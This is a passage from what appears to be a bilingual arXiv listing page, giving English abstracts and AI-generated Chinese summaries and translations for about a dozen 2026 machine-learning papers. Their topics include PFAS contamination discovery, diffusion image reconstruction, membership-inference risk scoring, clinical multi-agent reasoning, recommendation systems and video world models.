发表机构 * University of Michigan, Ann Arbor, MI, USA(密歇根大学,安阿伯分校) Washington University in St. Louis, St. Louis, MO, USA(华盛顿大学圣路易斯分校)

AI总结 提出一个统一的地理空间发现框架,结合主动学习、在线元学习和概念引导推理,通过概念加权不确定性采样和相关性感知元批次形成策略,在有限数据和动态环境下高效发现隐藏目标。

详情
AI中文摘要

在环境监测中,数据收集通常成本高昂、稀疏且受紧急公共卫生需求影响。这对于致癌的PFAS(全氟和多氟烷基物质)污染尤其如此,与领域专家和环境组织的讨论强调需要在有限的采样预算下战略性地识别高风险、观测不足的区域。更广泛地说,在灾害响应和公共卫生环境中也出现了类似的挑战,动态环境使得从有限的地面实况中高效发现隐藏目标变得至关重要。然而,稀疏且有偏差的地理空间标签限制了现有基于学习方法(如强化学习)的适用性。为了解决这个问题,我们提出了一个统一的地理空间发现框架,该框架集成了主动学习、在线元学习和概念引导推理。我们的方法引入了两个基于共享的*概念相关性*概念的关键创新,该概念捕捉领域特定因素如何影响目标存在:一个*概念加权不确定性采样策略*,其中不确定性通过从现成概念(如土地覆盖和源距离)学习到的相关性进行调节;以及一个*相关性感知元批次形成策略*,该策略在在线元更新期间促进语义多样性,提高动态环境中的泛化能力。我们在PFAS污染发现任务上评估了我们的框架,这是一个受真实世界启发的环境监测任务,展示了在有限数据和变化条件下鲁棒的目标发现能力。

英文摘要

In environmental monitoring, data collection is often costly, sparse, and shaped by urgent public-health needs. This is particularly true for cancer-causing PFAS (Per- and polyfluoroalkyl substances) contamination, where discussions with domain experts and environmental organizations highlight the need to strategically identify high-risk, under-observed regions under tight sampling budgets. More broadly, similar challenges arise in disaster response and public health settings, where dynamic environments make it essential to efficiently uncover hidden targets from limited ground truth. Yet sparse and biased geospatial labels limit the applicability of existing learning-based methods, such as reinforcement learning. To address this, we propose a unified geospatial discovery framework that integrates active learning, online meta-learning, and concept-guided reasoning. Our approach introduces two key innovations built on a shared notion of *concept relevance*, capturing how domain-specific factors influence target presence: a *concept-weighted uncertainty sampling strategy*, where uncertainty is modulated by learned relevance from readily available concepts such as land cover and source proximity; and a *relevance-aware meta-batch formation strategy* that promotes semantic diversity during online-meta updates, improving generalization in dynamic environments. We evaluate our framework on PFAS contamination discovery as a real-world inspired environmental monitoring task, demonstrating robust target discovery under limited data and changing conditions.

2510.03352 2026-05-27 cs.CV cs.AI cs.LG 版本更新

Inference-Time Search Using Side Information for Diffusion-Based Image Reconstruction

基于侧信息的推理时搜索用于扩散模型图像重建

Mahdi Farahbakhsh, Vishnu Teja Kunde, Dileep Kalathil, Krishna Narayanan, Jean-Francois Chamberland

发表机构 * Department of Electrical and Computer Engineering, Texas A&M University(电气与计算机工程系,德克萨斯A&M大学)

AI总结 提出一种即插即用、无需训练的推理时搜索框架,将侧信息融入现有扩散模型逆问题求解器,显著提升重建质量。

详情
AI中文摘要

扩散模型已被用作解决逆问题的先验。然而,现有方法通常忽略了能够显著提高重建质量的侧信息,尤其是在严重病态设置中。在这项工作中,我们提出了一种新颖的框架,通过推理时搜索将侧信息以即插即用、无需训练的方式融入现有的基于扩散模型的逆问题求解器。通过在多种逆问题(包括图像修复、超分辨率和几种去模糊任务)以及多种基于扩散模型的逆问题求解器(DPS、DAPS和MPGD)上的大量实验,我们表明,用我们的框架增强每个求解器,其重建质量始终优于相应的原始方法。为了展示我们方法的通用性,我们考虑了多种形式的侧信息,包括参考图像、文本描述和解剖学MRI扫描。代码可在该仓库中获取:https://github.com/mahdi-farahbakhsh/DISS。

英文摘要

Diffusion models have been used as priors for solving inverse problems. However, existing approaches typically overlook side information that could significantly improve reconstruction quality, especially in severely ill-posed settings. In this work, we propose a novel framework that incorporates side information into existing diffusion-based inverse problem solvers via inference-time search, in a plug-and-play, training-free manner. Through extensive experiments across a range of inverse problems, including inpainting, super-resolution, and several deblurring tasks, and across multiple diffusion-based inverse problem solvers (DPS, DAPS, and MPGD), we show that augmenting each solver with our framework consistently improves the quality of the reconstructions over the corresponding original method. To demonstrate the generality of our approach, we consider diverse forms of side information, including reference images, textual descriptions, and anatomical MRI scans. The code is available at this \href{https://github.com/mahdi-farahbakhsh/DISS}{repository}\footnote{https://github.com/mahdi-farahbakhsh/DISS}.

2602.15919 2026-05-27 stat.ML cs.AI cs.LG 版本更新

Assessing Per-Sample Membership Inference Vulnerability without Retraining

无需重训练的逐样本成员推断脆弱性评估

Valentin Dorseuil, Jamal Atif, Olivier Cappé

发表机构 * ENS, École normale supérieure(巴黎高等师范学院) Université PSL, CNRS(巴黎政治学院、国家科学研究中心) Institut Polytechnique de Paris(巴黎理工 institute)

AI总结 提出一种基于数据依赖几何度量的逐样本成员推断脆弱性评分方法,仅需单个训练模型即可高效识别高风险样本。

详情
AI中文摘要

近期隐私文献表明,针对样本的成员推断攻击(MIA)显著优于非针对性方法。受此启发,我们探讨以下问题:能否在不训练影子模型的情况下评估单个训练点的隐私脆弱性?我们表明,逐样本对MIA的暴露程度不仅受其损失影响,还受数据依赖的几何度量控制。在线性设置中,我们推导出个体黑盒MIA脆弱性的闭式分解,将其分解为总体杠杆得分和残差损失项,明确了样本依赖的几何结构如何转化为隐私暴露。由于大多数现代架构的最后一层是线性的,我们将此框架扩展到深度网络,并提出一种基于最后一层表示的替代评分,仅需单个训练模型且无需影子模型。跨不同数据集和架构的实验表明,我们的评分在识别最先进攻击下的最高风险点时优于损失和梯度范数基线,为逐样本隐私风险评估提供了计算高效且理论基础的工。

英文摘要

Recent work in the privacy literature shows that sample-targeted membership inference attacks (MIAs) significantly outperform untargeted approaches by a wide margin. Motivated by this observation, we address the following question: can the privacy vulnerability of individual training points be assessed without training shadow models? We show that per-sample exposure to MIA is governed not only by a point's loss, but also by a data-dependent geometric measure. In the linear setting, we derive a closed-form decomposition of individual black-box MIA vulnerability into a population leverage score and a residual loss term, making explicit how sample-dependent geometry translates into privacy exposure. Since the final layer of most modern architectures is linear, we extend this framework to deep networks and propose a surrogate score operating on last-layer representations that requires only a single trained model and no shadow models. Empirical evaluations across diverse datasets and architectures show that our score outperforms loss and gradient-norm baselines at identifying the highest-risk points under state-of-the-art attacks, providing a computationally efficient and theoretically grounded tool for per-sample privacy risk assessment.

2602.12833 2026-05-27 cs.LG cs.AI cs.MA 版本更新

Vital Trace: Protocol-Constrained Patient-State Reasoning for Longitudinal Clinical Trajectories

Vital Trace: 协议约束的患者状态推理用于纵向临床轨迹

Zhan Qu, Michael Färber

发表机构 * TU Dresden(德累斯顿理工大学)

AI总结 提出Vital Trace,一个协议约束的多智能体框架,通过紧凑的持久患者状态记忆和四个协调智能体(Router、Reasoner、Auditor、Steward)进行分阶段推理,以解决长期临床轨迹推理中的上下文漂移和不稳定问题,在MIMIC-IV和eICU数据集上预测未来血管加压药、呼吸、肾脏支持和恶化任务中优于自由形式多智能体基线。

详情
AI中文摘要

纵向临床推理需要跟踪电子健康记录中患者轨迹的生理测量、实验室结果和干预措施。现有的基于LLM的临床推理系统通常依赖于重复序列化患者历史或交换无约束的文本智能体消息,导致上下文漂移、推理不稳定以及长期推理成本增加。我们提出了Vital Trace,一个协议约束的多智能体框架,用于在动态ICU轨迹上进行未来临床风险预测。Vital Trace不维护无界文本历史,而是使用紧凑的持久患者状态记忆以及由四个协调智能体(Router、Reasoner、Auditor和Steward)执行的分阶段推理。为了支持时间上连贯的推理,我们引入了一个手动策划的全局协议,包含生理状态转换规则和动态患者状态表示,随时间跟踪血流动力学、呼吸、肾脏、代谢和炎症不稳定性。我们在MIMIC-IV和eICU上使用未来血管加压药支持、呼吸支持、肾脏支持和恶化预测任务评估Vital Trace。结果表明,与自由形式多智能体基线相比,结构化的协议约束推理提高了时间一致性、通信稳定性、校准性和可解释性,同时在长期ICU轨迹上实现了强大的预测性能。

英文摘要

Longitudinal clinical reasoning over electronic health records requires tracking evolving physiological measurements, laboratory results, and interventions across extended patient trajectories. Existing LLM-based clinical reasoning systems often rely on repeatedly serializing patient histories or exchanging unconstrained textual agent messages, leading to context drift, unstable reasoning, and growing inference cost over long horizons. We present Vital Trace, a protocol-constrained multi-agent framework for future clinical risk prediction over evolving ICU trajectories. Instead of maintaining unbounded textual histories, Vital Trace uses a compact persistent patient-state memory together with staged reasoning performed by four coordinated agents: a Router, Reasoner, Auditor, and Steward. To support temporally coherent reasoning, we introduce a manually curated Global Protocol containing physiological state-transition rules and a dynamic patient-state representation that tracks hemodynamic, respiratory, renal, metabolic, and inflammatory instability over time. We evaluate Vital Trace on MIMIC-IV and eICU using future vasopressor-support, respiratory-support, renal-support, and deterioration prediction tasks. Results show that structured protocol-constrained reasoning improves temporal consistency, communication stability, calibration, and interpretability compared with free-form multi-agent baselines while achieving strong predictive performance across long ICU trajectories.

2602.11799 2026-05-27 cs.AI cs.IR 版本更新

Hi-SAM: A Hierarchical Structure-Aware Multi-modal Framework for Large-Scale Recommendation

Hi-SAM: 一种面向大规模推荐的分层结构感知多模态框架

Pingjun Pan, Tingting Zhou, Peiyao Lu, Tingting Fei, Hongxiang Chen, Chuanjiang Luo

发表机构 * Netease Cloud Music(网易云音乐)

AI总结 针对多模态推荐中语义ID离散化存在的次优分词和架构-数据不匹配问题,提出Hi-SAM框架,通过解耦语义分词器和分层记忆-锚点Transformer,在冷启动场景下显著提升推荐性能。

Comments Accepted at ACM KDD 2026 ADS

详情
AI中文摘要

多模态推荐因物品具有文本和图像等丰富属性而受到关注。基于语义ID的方法有效地将这些信息离散化为紧凑的令牌。然而,存在两个挑战:(1)次优分词:现有方法(如RQ-VAE)缺乏共享跨模态语义和模态特定细节之间的解耦,导致冗余或崩溃;(2)架构-数据不匹配:普通Transformer将语义ID视为扁平流,忽略了用户交互、物品和令牌的层次结构。将物品扩展为多个令牌会放大长度和噪声,使注意力偏向局部细节而非整体语义。我们提出Hi-SAM,一种分层结构感知多模态框架,包含两个设计:(1)解耦语义分词器(DST):通过几何感知对齐统一模态,并通过从粗到细的策略进行量化。共享码本提取共识,而模态特定码本通过互信息最小化从残差中恢复细微差别;(2)分层记忆-锚点Transformer(HMAT):通过分层RoPE将位置编码分解为物品间和物品内子空间以恢复层次结构。它插入锚点令牌将物品压缩为紧凑记忆,保留当前物品的细节,同时仅通过压缩摘要访问历史。在真实世界数据集上的实验表明,相比最先进基线方法,Hi-SAM持续改进,尤其在冷启动场景中。在服务数百万用户的大规模社交平台上部署后,Hi-SAM在核心在线指标上实现了6.55%的提升。

英文摘要

Multi-modal recommendation has gained traction as items possess rich attributes like text and images. Semantic ID-based approaches effectively discretize this information into compact tokens. However, two challenges persist: (1) Suboptimal Tokenization: existing methods (e.g., RQ-VAE) lack disentanglement between shared cross-modal semantics and modality-specific details, causing redundancy or collapse; (2) Architecture-Data Mismatch: vanilla Transformers treat semantic IDs as flat streams, ignoring the hierarchy of user interactions, items, and tokens. Expanding items into multiple tokens amplifies length and noise, biasing attention toward local details over holistic semantics. We propose Hi-SAM, a Hierarchical Structure-Aware Multi-modal framework with two designs: (1) Disentangled Semantic Tokenizer (DST): unifies modalities via geometry-aware alignment and quantizes them via a coarse-to-fine strategy. Shared codebooks distill consensus while modality-specific ones recover nuances from residuals, enforced by mutual information minimization; (2) Hierarchical Memory-Anchor Transformer (HMAT): splits positional encoding into inter- and intra-item subspaces via Hierarchical RoPE to restore hierarchy. It inserts Anchor Tokens to condense items into compact memory, retaining details for the current item while accessing history only through compressed summaries. Experiments on real-world datasets show consistent improvements over SOTA baselines, especially in cold-start scenarios. Deployed on a large-scale social platform serving millions of users, Hi-SAM achieved a 6.55% gain in the core online metric.

2508.03771 2026-05-27 cs.CY cs.AI 版本更新

Trustworthiness of Legal Considerations for the Use of LLMs in Education

LLM在教育中使用的法律考量可信度

Sara Alaswad, Tatiana Kalganova, Wasan Awad

发表机构 * College of Information Technology(信息科技学院) Brunel University of London(伦敦布鲁内尔大学) Ahlia University(阿利亚大学)

AI总结 本文通过比较全球主要地区(欧盟、英国、美国、中国、海湾合作委员会国家)的AI监管框架,提出针对海湾合作委员会国家的合规中心AI治理框架,以促进教育中AI系统的合法、伦理和文化适应性部署。

Comments 11 pages, 3 figures, 6 tables

详情
Journal ref
Proc. IEEE DASA 2025, Manama, Bahrain, 2025
AI中文摘要

随着人工智能(AI),特别是大型语言模型(LLMs)日益嵌入全球教育系统,确保其伦理、法律和情境适当的部署已成为关键政策问题。本文对全球主要地区(包括欧盟、英国、美国、中国和海湾合作委员会(GCC)国家)的AI相关监管和伦理框架进行了比较分析。它映射了核心可信度原则(如透明度、公平性、问责制、数据隐私和人类监督)如何嵌入区域立法和AI治理结构中。特别强调了GCC地区不断发展的格局,这些国家正在迅速推进国家AI战略和教育部门创新。为支持这一发展,本文提出了一个针对GCC背景量身定制的以合规为中心的AI治理框架。这包括一个分层类型学和机构检查清单,旨在帮助监管机构、教育工作者和开发者将AI采用与国际规范和当地价值观对齐。通过综合全球最佳实践与区域特定挑战,本文为在教育中构建合法、伦理基础和文化敏感的AI系统提供了实用指导。这些见解旨在为未来的监管协调提供信息,并促进不同教育环境中负责任的AI集成。

英文摘要

As Artificial Intelligence (AI), particularly Large Language Models (LLMs), becomes increasingly embedded in education systems worldwide, ensuring their ethical, legal, and contextually appropriate deployment has become a critical policy concern. This paper offers a comparative analysis of AI-related regulatory and ethical frameworks across key global regions, including the European Union, United Kingdom, United States, China, and Gulf Cooperation Council (GCC) countries. It maps how core trustworthiness principles, such as transparency, fairness, accountability, data privacy, and human oversight are embedded in regional legislation and AI governance structures. Special emphasis is placed on the evolving landscape in the GCC, where countries are rapidly advancing national AI strategies and education-sector innovation. To support this development, the paper introduces a Compliance-Centered AI Governance Framework tailored to the GCC context. This includes a tiered typology and institutional checklist designed to help regulators, educators, and developers align AI adoption with both international norms and local values. By synthesizing global best practices with region-specific challenges, the paper contributes practical guidance for building legally sound, ethically grounded, and culturally sensitive AI systems in education. These insights are intended to inform future regulatory harmonization and promote responsible AI integration across diverse educational environments.

2602.10450 2026-05-27 cs.LG cs.AI math.OC 版本更新

Constructing Industrial-Scale Optimization Modeling Benchmark

构建工业规模优化建模基准

Zhong Li, Hongliang Lu, Tao Wei, Yuxuan Chen, Wenyu Liu, Yuan Lan, Fan Zhang, Zaiwen Wen

发表机构 * Great Bay University(大湾大学) Peking University(北京大学) Huawei Technologies Co., Ltd(华为技术有限公司)

AI总结 提出MIPLIB-NL基准,通过结构感知逆向构建方法从真实混合整数线性规划中生成自然语言规范与求解器代码,以评估大语言模型在工业规模优化建模中的性能。

Comments This paper was accepted by ICML'26 for publication

详情
AI中文摘要

优化建模支撑着物流、制造、能源和金融领域的决策,然而将自然语言需求转化为正确的优化公式和可执行求解器代码仍然需要大量人力。尽管大语言模型(LLMs)已被探索用于此任务,但评估仍以玩具级或合成基准为主,掩盖了具有$10^{3}$--$10^{6}$(或更多)变量和约束的工业问题的难度。一个关键瓶颈是缺乏将自然语言规范与基于真实优化模型的参考公式/求解器代码对齐的基准。为填补这一空白,我们引入了MIPLIB-NL,它通过一种结构感知的逆向构建方法从MIPLIB~2017中的真实混合整数线性规划构建而成。我们的流程(i)从平坦的求解器公式中恢复紧凑、可复用的模型结构,(ii)在统一的模型-数据分离格式下,逆向生成明确关联到该恢复结构的自然语言规范,以及(iii)通过专家评审和人类-LLM交互以及独立的逆向检查进行迭代语义验证。这产生了223个一对一的重构,保留了原始实例的数学内容,同时实现了现实的自然语言到优化评估。实验表明,在现有基准上表现良好的系统在MIPLIB-NL上性能显著下降,暴露了在玩具规模下不可见的失败模式。

英文摘要

Optimization modeling underpins decision-making in logistics, manufacturing, energy, and finance, yet translating natural-language requirements into correct optimization formulations and solver-executable code remains labor-intensive. Although large language models (LLMs) have been explored for this task, evaluation is still dominated by toy-sized or synthetic benchmarks, masking the difficulty of industrial problems with $10^{3}$--$10^{6}$ (or more) variables and constraints. A key bottleneck is the lack of benchmarks that align natural-language specifications with reference formulations/solver code grounded in real optimization models. To fill in this gap, we introduce MIPLIB-NL, built via a structure-aware reverse construction methodology from real mixed-integer linear programs in MIPLIB~2017. Our pipeline (i) recovers compact, reusable model structure from flat solver formulations, (ii) reverse-generates natural-language specifications explicitly tied to this recovered structure under a unified model--data separation format, and (iii) performs iterative semantic validation through expert review and human--LLM interaction with independent reconstruction checks. This yields 223 one-to-one reconstructions that preserve the mathematical content of the original instances while enabling realistic natural-language-to-optimization evaluation. Experiments show substantial performance degradation on MIPLIB-NL for systems that perform strongly on existing benchmarks, exposing failure modes invisible at toy scale.

2602.10104 2026-05-27 cs.CV cs.AI cs.LG 版本更新

Olaf-World: Orienting Latent Actions for Video World Modeling

Olaf-World: 面向视频世界模型的潜在动作定向

Yuxin Jiang, Yuchao Gu, Ivor W. Tsang, Mike Zheng Shou

发表机构 * Show Lab, National University of Singapore Research (A STAR), Singapore

AI总结 提出SeqΔ-REPA对齐目标,通过冻结自监督视频编码器的时序特征差异锚定潜在动作,实现无标签视频中可迁移的动作控制世界模型预训练。

Comments ICML 2026. Project page: https://showlab.github.io/Olaf-World/ Code: https://github.com/showlab/Olaf-World

详情
AI中文摘要

扩展动作可控世界模型受限于动作标签的稀缺性。虽然潜在动作学习有望从无标签视频中提取控制接口,但学习到的潜在表示往往难以跨上下文迁移:它们纠缠了场景特定线索,缺乏共享坐标系。这是因为标准目标仅在每个片段内操作,没有提供跨上下文对齐动作语义的机制。我们的关键洞察是,尽管动作未被观测到,但其语义效果是可观测的,可以作为共享参考。我们引入SeqΔ-REPA,一种序列级控制效果对齐目标,将集成潜在动作锚定到来自冻结自监督视频编码器的时序特征差异。基于此,我们提出Olaf-World,一个从大规模被动视频中预训练动作条件视频世界模型的流程。大量实验表明,我们的方法学习了更结构化的潜在动作空间,从而在零样本动作迁移和适应新控制接口的数据效率上优于最先进的基线方法。

英文摘要

Scaling action-controllable world models is limited by the scarcity of action labels. While latent action learning promises to extract control interfaces from unlabeled video, learned latents often fail to transfer across contexts: they entangle scene-specific cues and lack a shared coordinate system. This occurs because standard objectives operate only within each clip, providing no mechanism to align action semantics across contexts. Our key insight is that although actions are unobserved, their semantic effects are observable and can serve as a shared reference. We introduce Seq$Δ$-REPA, a sequence-level control-effect alignment objective that anchors integrated latent action to temporal feature differences from a frozen, self-supervised video encoder. Building on this, we present Olaf-World, a pipeline that pretrains action-conditioned video world models from large-scale passive video. Extensive experiments demonstrate that our method learns a more structured latent action space, leading to stronger zero-shot action transfer and more data-efficient adaptation to new control interfaces than state-of-the-art baselines.

2602.09038 2026-05-27 cs.DB cs.AI 版本更新

Scaling GraphLLM with Bilevel-Optimized Sparse Querying

基于双层优化稀疏查询的GraphLLM扩展

Yangzhe Peng, Haiquan Qiu, Quanming Yao, Kun He

发表机构 * Huazhong University of Science and Technology(华中科技大学) Tsinghua University(清华大学)

AI总结 提出BOSQ框架,通过自适应稀疏查询策略选择性调用LLM,在降低计算成本的同时保持或提升图节点任务性能。

详情
AI中文摘要

LLMs最近通过提供解释特征,在文本属性图(TAGs)上增强节点级任务方面显示出强大潜力。然而,重复LLM查询的高计算和货币成本严重限制了其实际应用。举例来说,使用代表性方法(如TAPE)为中等规模基准(如Photo,48k节点)上的所有节点朴素生成解释将消耗数天的处理时间。在本文中,我们提出双层优化稀疏查询(BOSQ),一个通用框架,选择性利用LLM导出的解释特征来提升TAGs上节点级任务的性能。我们设计了一种自适应稀疏查询策略,选择性决定何时调用LLM,避免冗余或低增益查询,显著降低计算开销。在涉及两种节点级任务的六个真实世界TAG数据集上的大量实验表明,BOSQ比现有GraphLLM方法运行速度显著更快,同时持续提供相当或更优的性能。

英文摘要

LLMs have recently shown strong potential in enhancing node-level tasks on text-attributed graphs (TAGs) by providing explanation features. However, their practical use is severely limited by the high computational and monetary cost of repeated LLM queries. To illustrate, naively generating explanations for all nodes on a medium-sized benchmark like Photo (48k nodes) using a representative method (e.g., TAPE) would consume days of processing time. In this paper, we propose Bilevel-Optimized Sparse Querying (BOSQ), a general framework that selectively leverages LLM-derived explanation features to enhance performance on node-level tasks on TAGs. We design an adaptive sparse querying strategy that selectively decides when to invoke LLMs, avoiding redundant or low-gain queries and significantly reducing computation overhead. Extensive experiments on six real-world TAG datasets involving two types of node-level tasks demonstrate that BOSQ runs substantially faster than existing GraphLLM methods while consistently delivering on-par or superior performance.

2602.08586 2026-05-27 cs.AI 版本更新

DIANOIA: Diagnostic Decomposition and Joint Optimization for Multi-Agent Reasoning

DIANOIA: 多智能体推理的诊断性分解与联合优化

Yiming Yang, Zhuoyuan Li, Fanxiang Zeng, Hao Fu, Yue Liu

发表机构 * Alibaba Group(阿里巴巴集团)

AI总结 提出DIANOIA框架,通过覆盖度、保真度和综合度三个可测量通道分解多智能体推理增益,并基于此设计诊断协议和对应系统,在多个基准上以更少token实现更优性能。

详情
AI中文摘要

多智能体LLM系统持续优于单智能体基线,但从业者仍无法预测哪种设计适用于新任务或诊断失败原因。我们认为这一差距主要源于该领域缺乏具有可测量原语和可测试预测的诊断框架。我们引入 extbf{DIANOIA},将多智能体推理增益分解为覆盖度、保真度和综合度三个通道,每个通道均可经验测量。基于此分解,我们推导出一个诊断协议,可识别任何给定任务的瓶颈通道。我们将该协议实例化为一个多智能体系统,其三个组件与通道对应:角色多样化的提议者(覆盖度)、基于执行验证的验证者(保真度)和迭代综合者。在GSM8K、AIME-2025、MBPP和BFCL-SP上,我们的方法在匹配token预算下优于强多智能体基线,在MBPP上以约$5 imes$的token节省主导帕累托前沿,在匹配成本下达到$+4.6$pp。在每个基准上,协议都能正确选择瓶颈通道;我们围绕它构建的系统在多个模型上领先。我们发布代码、适配器、诊断指标和Claude Code技能,网址为https://anonymous.4open.science/r/DIANOIA4MAS。DIANOIA将多智能体设计重新定义为通道感知的资源分配:诊断你的任务的瓶颈通道,然后相应投入token。

英文摘要

Multi-agent LLM systems consistently outperform single-agent baselines, yet practitioners still cannot predict which design works for a new task or diagnose why one fails. We argue this gap persists largely because the field lacks a diagnostic framework with measurable primitives and testable predictions. We introduce \textbf{DIANOIA}, a three-channel decomposition of multi-agent reasoning gain into coverage, fidelity, and synthesis, each of which is empirically measurable. From this decomposition, we derive a diagnostic protocol that identifies the bottleneck channels for any given task. We instantiate the protocol as a multi-agent system whose three components mirror the channels: role-diverse proposers for coverage, execution-grounded verification for fidelity, and iterative synthesis. On GSM8K, AIME-2025, MBPP, and BFCL-SP, our method outperforms strong multi-agent baselines under matched token budgets, dominating the Pareto frontier on MBPP at $\sim$$5{\times}$ token savings and reaching $+4.6$pp at matched cost. On every benchmark, the protocol picks the right bottleneck channels; the system we built around it leads across models. We release code, adapters, diagnostic metrics, and a Claude Code skill at https://anonymous.4open.science/r/DIANOIA4MAS. DIANOIA reframes multi-agent design as channel-aware resource allocation: diagnose which channel is the bottleneck for your task, then invest tokens accordingly.

2511.16449 2026-05-27 cs.CV cs.AI 版本更新

Bridging the Semantic-Action Gap in Visual Token Pruning for Efficient VLA Inference

弥合视觉令牌剪枝中的语义-动作鸿沟以实现高效VLA推理

Ziyan Liu, Yeqiu Chen, Hongyi Cai, Tao Lin, Shuo Yang, Zheng Liu, Bo Zhao

发表机构 * School of AI, Shanghai Jiao Tong University(上海交通大学人工智能学院) University of Science and Technology of China(中国科学技术大学) Harbin Institute of Technology (Shenzhen)(哈尔滨工业大学(深圳)) BAAI(北京人工智能研究院)

AI总结 提出VLA-Pruner方法,通过结合语义预填充和时序平滑的动作相关性估计视觉令牌重要性,并采用Combine-then-Filter策略,在保持操作质量的同时实现高达1.99倍加速。

详情
AI中文摘要

视觉-语言-动作(VLA)模型通过整合视觉感知、语言理解和动作执行,在具身人工智能中展现出巨大潜力。在实时部署中,这些模型必须处理连续的视觉流,产生大量计算开销。视觉令牌剪枝——一种通过保留显著令牌同时丢弃冗余令牌来加速视觉-语言模型(VLM)的主流技术——为这一挑战提供了自然的候选解决方案。然而,直接将面向VLM的剪枝方法应用于VLA推理会导致操作性能严重下降。我们的分析将这种下降归因于一个关键不匹配:VLA推理在视觉-语言预填充阶段和动作解码阶段表现出不同的注意力模式,因此仅基于上下文预填充语义显著性的剪枝偏向语义线索,可能移除动作关键的视觉令牌。受此观察启发,我们提出VLA-Pruner,一种有效的即插即用令牌剪枝方法,基于VLA推理的视觉需求,并进一步利用机器人操作的时间连续性。具体来说,VLA-Pruner从语义预填充和时序平滑的动作相关性两方面估计视觉令牌重要性,然后采用Combine-then-Filter策略,在计算预算下保留紧凑、非冗余的令牌。实验表明,VLA-Pruner在多种VLA架构上优于最先进方法,在相当的操作质量下实现高达1.99倍加速。

英文摘要

Vision-Language-Action (VLA) models have shown great potential for embodied AI by integrating visual perception, language understanding, and action execution. In real-time deployment, these models must process continuous visual streams, incurring substantial computational overhead. Visual token pruning -- a mainstream technique for accelerating Vision-Language Models (VLMs) by retaining salient tokens while discarding redundant ones -- offers a natural candidate solution to this challenge. However, directly applying VLM-oriented pruning methods to VLA inference can cause severe degradation in manipulation performance. Our analysis attributes this degradation to a key mismatch: VLA inference exhibits distinct attention patterns between the vision-language prefill stage and the action-decode stage, so pruning based only on context-prefill semantic salience is biased toward semantic cues and may remove action-critical visual tokens. Motivated by this observation, we propose VLA-Pruner, an effective plug-and-play token pruning method grounded in the visual requirements of VLA inference, further exploiting the temporal continuity of robot manipulation. Specifically, VLA-Pruner estimates visual-token importance from both semantic prefilling and temporally smoothed action relevance, and then applies a Combine-then-Filter strategy to retain compact, non-redundant tokens under the compute budget. Experiments show that VLA-Pruner outperforms state-of-the-art approaches across multiple VLA architectures, achieving up to 1.99x speedup with comparable manipulation quality.

2511.06625 2026-05-27 cs.CV cs.AI cs.LG 版本更新

Explainable Cross-Disease Reasoning for Cardiovascular Risk Assessment from Low-Dose Computed Tomography

可解释的跨疾病推理:基于低剂量计算机断层扫描的心血管风险评估

Yifei Zhang, Jiashuo Zhang, Mojtaba Safari, Xiaofeng Yang, Liang Zhao

发表机构 * Department of Computer Science, Emory University(埃默里大学计算机科学系) Department of Computer Science, Johns Hopkins University(约翰霍普金斯大学计算机科学系) Department of Radiation Oncology(放射肿瘤学部) Winship Cancer Institute, Emory University(埃默里大学Winship癌症研究所)

AI总结 提出一种可解释的跨疾病推理框架,通过提取肺部发现、基于医学知识进行跨器官机制推理,并结合心脏子体积特征,从低剂量胸部CT中实现心血管风险评估,在NLST队列中AUC达0.919。

详情
AI中文摘要

低剂量胸部计算机断层扫描(LDCT)在一次扫描中捕获肺部和心脏结构,使得能够联合评估肺部和心血管健康。现有方法通常独立建模这些领域,并未明确表示它们的生理交互。我们提出了一种可解释的跨疾病推理框架,用于从LDCT进行心血管风险评估。该框架遵循受限的临床信息路径:它提取肺部发现,将跨器官机制基于医学知识进行推理,并生成带有自然语言理由的心血管预测。它结合了四个组件:一个冻结的肺风险先验、一个肺部感知模块、一个代理推理模块和一个心脏子体积特征提取器。它们的输出被融合,以将局部心脏证据与机制层面的肺部上下文整合。在国家肺筛查试验队列中,该框架在CVD筛查中达到0.919的AUC,在CVD死亡率预测中高达0.838,优于心脏特异性、单疾病和基础模型基线。目标对照表明,这些增益不能仅由额外的胸部视觉特征、固定规则传播或单一推理后端解释。因此,所提出的框架提供了一种可审计的方法,用于从LDCT进行跨疾病心血管风险评估。

英文摘要

Low-dose chest computed tomography (LDCT) captures pulmonary and cardiac structures in a single scan, enabling joint assessment of lung and cardiovascular health. Existing approaches typically model these domains independently and do not explicitly represent their physiological interactions. We propose an Explainable Cross-Disease Reasoning Framework for cardiovascular risk assessment from LDCT. The framework follows a constrained clinical-information pathway: it extracts pulmonary findings, grounds cross-organ mechanisms in medical knowledge, and produces a cardiovascular prediction with a natural-language rationale. It combines four components: a frozen lung-risk prior, a pulmonary perception module, an agentic reasoning module, and a cardiac subvolume feature extractor. Their outputs are fused to integrate localized cardiac evidence with mechanism-level pulmonary context. On the National Lung Screening Trial cohort, the framework achieves an AUC of 0.919 for CVD screening and up to 0.838 for CVD mortality prediction, outperforming cardiac-specific, single-disease, and foundation-model baselines. Targeted controls indicate that the gains are not explained by additional thoracic visual features alone, fixed rule propagation, or a single reasoning backend. The proposed framework thus provides an auditable approach to cross-disease cardiovascular risk assessment from LDCT.

2507.13428 2026-05-27 cs.CV cs.AI 版本更新

"PhyWorldBench": A Comprehensive Evaluation of Physical Realism in Text-to-Video Models

PhyWorldBench:文本到视频模型中物理真实性的全面评估

Jing Gu, Xian Liu, Yu Zeng, Ashwin Nagarajan, Fangrui Zhu, Daniel Hong, Yue Fan, Qianqi Yan, Kaiwen Zhou, Ming-Yu Liu, Xin Eric Wang

发表机构 * University of California, Santa Cruz(加州大学圣克ruz分校) NVIDIA Research(NVIDIA研究) Northeastern University(东北大学) University of California, Santa Barbara(加州大学圣巴巴拉分校)

AI总结 提出PhyWorldBench基准,通过1050个提示评估12个视频生成模型在物理规律遵循上的表现,并引入反物理类别,利用多模态大语言模型进行零样本评估。

Comments 35 pages, 21 figures

详情
Journal ref
ICLR 2026 oral
AI中文摘要

